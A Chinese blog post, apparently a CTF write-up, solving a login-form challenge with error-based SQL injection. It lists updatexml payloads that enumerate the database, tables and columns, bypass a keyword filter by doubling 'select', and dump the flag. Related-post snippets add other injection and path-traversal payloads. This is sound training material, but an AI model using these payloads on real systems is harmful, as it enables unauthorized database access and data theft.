NU1LCTFer的成长之路-web入门-CTF中的sql注入-sql注入-2-wp

最新推荐文章于 2022-12-08 09:40:58 发布
最新推荐文章于 2022-12-08 09:40:58 发布
阅读量257 收藏
点赞数 1
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/118343647
版权

sql注入-2

根据网页源代码hint添加get型参数tips

bp抓包,可以发现存在两个post型参数,name和pass,尝试了一番union联合查询注入,无法利用,遂改报错注入,这里使用updatexml

发现可以正常注入

name=admin' and updatexml(1,concat(0x7e,(select 1),0x7e),1)#&pass=111111

查当前数据库 note

name=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&pass=111111

查表(note) fl4g

name=admin' and updatexml(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema='note' limit 0,1),0x7e),1)#&pass=111111	//失败,可能过滤了一些字符

name=admin' and updatexml(1,concat(0x7e,(seselectlect concat(table_name) from information_schema.tables where table_schema='note' limit 0,1),0x7e),1)#&pass=111111	//双写select绕过

查字段(fl4g) flag

name=admin' and updatexml(1,concat(0x7e,(seselectlect concat(column_name) from information_schema.columns where table_name='fl4g' limit 0,1),0x7e),1)#&pass=111111

dump数据

name=admin' and updatexml(1,concat(0x7e,(seselectlect flag from fl4g),0x7e),1)#&pass=111111

I

居上7788
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《从0到1:CTFer成长之路SQL注入-2
tr_trTTT的博客
04-13 3293
前言: 我是新手小白,创建此文章只为了记录自己的学习 题目: 我们先进入环境,既然是sql注入,那就可以通过手工或者sqlmap来进行注入 上面就是题目,有登录框,我们先用手工测试sql注入。 手工方法: 1. 随便输入一个账号试试: 输入admin显示账号或密码错误,输入其他显示账号不存在,所以这里可以判断账号是admin; 2.开始判断注入 ...
CTF-Web-SQL注入
beihai2013
01-26 3272
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
NU1LCTFer成长之路-web入门-CTFsql注入-sql注入-1-wp
居上
06-28 245
sql注入-1 主页是这个样子 判断注入类型 字符型 单引号 id=1' and 1=1--+ id=1' and 1=2--+ 判断列数 三列 id=-1' order by 3--+ 查询是否有显示位 union联合查询注入 2、3号位 id=-1 union select 1,2,3--+ 查询数据库 informaion_schema、note id=-1' union select 1,(select concat(schema_name) from information
CTHUB-N1Book-第一章Web入门-CTFSQL注入-SQL注入-2
weixin_40872714的博客
03-28 933
CTHUB-N1Book-第一章Web入门-CTFSQL注入-SQL注入-2 查看html代码,看到有一个提示,说明是要我们报错注入 先抓包,加了tips=1后就会有报错的信息 首先报数据库 note 尝试报表名,出错了,根据错误信息,可能是前面的select被过滤了,这里就是不断尝试,没有什么好的方法 使用双写绕过 获得了关键的fl4g表,flag应该就在这里面 尝试报字段名得到flag字段 直接得到flag ...
N1BOOK第六关摸鱼:[第一章 web入门]SQL注入-2
weixin_45571987的博客
12-04 4037
BUUCTF:[第一章 web入门]SQL注入-2打开题目,寻找解题线索开始解题得到回显开始注入题目原理 打开题目,寻找解题线索   直接打开链接页面如下,我们按提示分别访问/login.php 和 /user.php 去看看   进入页面后习惯性地查看源代码发现有一行注释提示,告诉我们:可以在url后加入?tips=1 开启mysql错误提示,使用burp发包就可以看到啦   另一个页面则就只有一行 login first 开始解题 得到回显   此时我们打开burp进行抓包(没有安装burp的兄
Web_SQL注入(1)
Lemon's blog
07-15 613
[GYCTF2020]Blacklist ——涉及新知识HANDLER ... OPEN等、堆叠注入 这道题和之前做那道强网杯的题目一样,但之前的方法比如读取flag时改表名或者是用SQL的预处理进行绕过都不可行了,因为过滤了set prepare alter rename 所以这里就涉及到了一种新的方法 HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关
BUUCTF:[GYCTF2020]Ezsqli --过滤了information_schem ------ 无列明注入之过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1469
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该时可以的。 但是 information_chema等被过滤了,表和 列都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是表明不知道,这时可以用这个来sys.schem
网络安全与CTF学习信息汇总
墙角睡大觉的专栏
07-11 3033
http://www.sec-wiki.com/skill/ 安全技能(里面渗透逆向编程都有介绍)http://blog.knownsec.com/Knownsec_RD_Checklist/ 知道创宇研发技能表v3.0**********************************************************综合学习平台:http://edu.gooann.com/ 谷安...
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
NU1LCTFer成长之路-web入门-任意文件读取漏洞-afr_2-wp
居上
06-29 247
afr_2 nginx配置错误 payload http://192.168.60.134/img../flag
NU1LCTFer成长之路-web入门-信息收集-举足轻重的信息搜集-wp
居上
06-28 137
举足轻重的信息搜集 直接扫下目录 flag被分成了3段 flag1=>robots.txt里面的flag1_is_her3_fun.txt flag1:n1book{info_1 flag2=>http://192.168.60.134/index.php~ flag2:s_v3ry_im flag3=>http://192.168.60.134/.index.php.swp打开搜索flag得到flag3 flag3:p0rtant_hack} 最终flag n1book{in
NU1LCTFer成长之路-web入门-信息收集-粗心的小李-wp
居上
06-28 203
粗心的小李 直接使用scrabble一把梭 ./scrabble http://192.168.60.134/ 文件下多出一个index.php,里面即可看到flag
西湖论剑 Flagshop 分析复现
最新发布
YJ_12340的博客
12-08 522
比赛时候没能做出来,其实这道题就是一道pwn题。后面与p w n师傅讨论分析EXP分析还原了解题过程。学到了很多,也希望分享给大家。抓包或者看源码就会发现有一个SSRF,但是没有权限读flag,测试发现存在一个readflag的elf文件。 读取题目全部源码: 文件写入 从源码可以知道,这里是存在一个文件写入的问题,但是测试和对copy这个elf文件反编译发现,网站根目录是没有写入权限的。但是测试发现tmp目录是可写的。做到这里基本没思路了。后面看了下Nul1的wp,发现这
i春秋《从0到1:CTFer成长之路》题目(Web——SQL注入-2)
LSYZWF的博客
05-21 2054
文章目录题目链接:解题思路1、首先点击login.php,输入进行尝试2、开始尝试是否存在注入3、这里可以判断列字段的个数,但是没有回显此步可以省略4、由于没有回显,故只能尝试盲注5、抓包分析6、编写脚本 题目链接: https://www.ichunqiu.com/battalion?t=1&r=68487 解题思路 1、首先点击login.php,输入进行尝试 输入admin显示账户或者密码错误 而输入其他显示账号不存在 这里可以初步猜测用户名就是admin 2、开始尝试是否存在注入 输入a
0到1 ctfer: SQL注入-2
Zeker62的博客
08-31 1959
分析这个靶场 : 登录靶场,只有一个空空的界面: 很明显,这是一个登录到账号密码的关于SQL注入的题目 尝试输入admin和其他用户名,发现是不一样的报错: 说明这里的机制是:先检查账号是否存在,再检查账号和密码是否对应 由此可以使用burpsuite抓包进行报错注入的操作: 经过抓包,在burp上显示不同的内容: “账号不存在” “账号和密码错误” 所以由此可以判断出,账号密码是否正确,来源于报错: 用户名正确报错:{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5
NU1L-BOOK笔记(一)
baidu_39504221的博客
11-25 605
文章目录信息收集0x01 敏感目录泄露0x02 敏感备份文件0x03 Banner识别 信息收集 敏感目录、敏感备份文件、Banner识别三方面 0x01 敏感目录泄露 git泄露 推荐工具scrabble 1.常规用法: ./scrabble <url> 2.git回滚:git reset --hard HEAD HEAD^(HEAD表示当前版本, HEAD^表示上个版本) 或者先git log --stat查看每个commit修改了那些文件再git diffHEAD <commit-i
NU1L-BOOK题目[第一章]
baidu_39504221的博客
11-24 768
文章目录[第一章 web入门]常见的搜集[第一章 web入门]粗心的小李[第一章 web入门]SQL注入-1[第一章 web入门]afr_1[第一章 web入门]afr_2[第一章 web入门]SQL注入-2 [第一章 web入门]常见的搜集 扫他后台 robots.txt index.php~ .index.php.swp [第一章 web入门]粗心的小李 直接使用书上推荐的工具scrabble 看他网站源码 [第一章 web入门]SQL注入-1 直接单引号报错,存在注入 查看字段 order
2021-7-1sqlmap解决ctfhub的sql部分注入题型
qq_45290991的博客
07-01 271
一、cookie注入 二、UA注入 这个真的很难,sqlmap跑了好久……一直测不出来,,不知道为什么,参数也没错啊…… 三、refer注入 https://www.cnblogs.com/0yst3r-2046/p/12493132.html 可以参考这个,,最后一个类型是真的不想跑了 很卡…… ...
mysql与SQL注入CTF Web安全探索关键信息库
本文档主要探讨了MySQL与SQL注入Web安全和CTF(Capture The Flag,网络安全竞赛)的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值